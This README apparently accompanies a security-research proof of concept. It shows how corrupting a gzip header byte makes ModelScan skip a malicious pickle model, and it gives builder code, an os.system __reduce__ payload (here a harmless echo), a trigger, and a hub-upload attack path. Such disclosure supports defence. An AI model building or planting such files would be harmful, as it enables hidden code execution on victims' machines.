# ModelScan Bypass - Corrupt Compression Header

Security research - ModelScan bypass technique.

## Overview
This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.
## Technique

Malformed compression header: a gzip file whose first header byte is overwritten with `0x00`, corrupting the gzip magic (`0x1f 0x8b`).

## File

`exploit_corrupt_header.joblib.gz`
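A file of this shape can be constructed roughly as follows. This is a sketch, not the repository's actual build script: the `Payload` class and the benign `echo` command are hypothetical stand-ins for the real exploit object.

```python
import gzip
import os
import pickle

# Hypothetical stand-in for the exploit object: pickle's __reduce__ hook
# makes deserialization call os.system. A benign `echo` replaces a real payload.
class Payload:
    def __reduce__(self):
        return (os.system, ('echo "RCE executed!"',))

# Serialize and gzip-compress the object, then corrupt the first header
# byte: the gzip magic 0x1f 0x8b becomes 0x00 0x8b.
blob = bytearray(gzip.compress(pickle.dumps(Payload())))
blob[0] = 0x00

with open("exploit_corrupt_header.joblib.gz", "wb") as f:
    f.write(bytes(blob))
```

Note that only the header byte is damaged; the compressed pickle stream after it is intact, which is what the bypass relies on.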
## Reproduction Steps

### Testing with ModelScan

```shell
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository, then scan it
modelscan scan -p exploit_corrupt_header.joblib.gz
```
### Expected Result

```
SKIPPED - Scanner did not analyze this file
```
### Triggering the Exploit

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_corrupt_header.joblib.gz')
```
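The payload can also be examined without triggering it: `pickletools` decodes pickle opcodes but never executes them. The sketch below is self-contained, building a corrupted-header sample in memory (with the hypothetical `Payload` stand-in and a benign `echo`) rather than reading the repository's file.

```python
import gzip
import io
import os
import pickle
import pickletools

class Payload:  # hypothetical stand-in for the repository's exploit object
    def __reduce__(self):
        return (os.system, ('echo "RCE executed!"',))

# Build a corrupted-header sample in memory, mirroring the PoC file.
blob = bytearray(gzip.compress(pickle.dumps(Payload())))
blob[0] = 0x00

# To inspect safely: restore the gzip magic byte, decompress, and
# disassemble. The reference to os.system and the REDUCE opcode that
# would invoke it appear in the listing without ever being executed.
blob[0] = 0x1F
listing = io.StringIO()
pickletools.dis(gzip.decompress(bytes(blob)), listing)
print(listing.getvalue())
```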
## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```
Why ModelScan misses this: the corrupted first byte destroys the gzip magic (`0x1f 0x8b`), so the scanner cannot decompress the archive. Rather than flagging the unreadable file as suspicious, it reports it as skipped, and the pickle payload inside is never scanned.
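ModelScan's internal code path is not reproduced here, but the failure mode is easy to demonstrate with Python's own `gzip` module, which rejects the corrupted magic outright; any tool that must decompress before scanning never sees the pickle inside:

```python
import gzip

# A harmless stand-in payload, compressed and then header-corrupted.
data = gzip.compress(b"not actually malicious")
corrupted = b"\x00" + data[1:]

try:
    gzip.decompress(corrupted)
except gzip.BadGzipFile as exc:
    # Standard tooling refuses the file; a scanner that treats this
    # as "not a recognizable archive" skips it instead of flagging it.
    print("decompression failed:", exc)
```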
## Security Impact

**Severity:** HIGH

**Attack Vector:**

1. Attacker creates a malicious model using this technique
2. Attacker uploads it to a model hub (Hugging Face, etc.)
3. Victim downloads the model and scans it with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads the model → RCE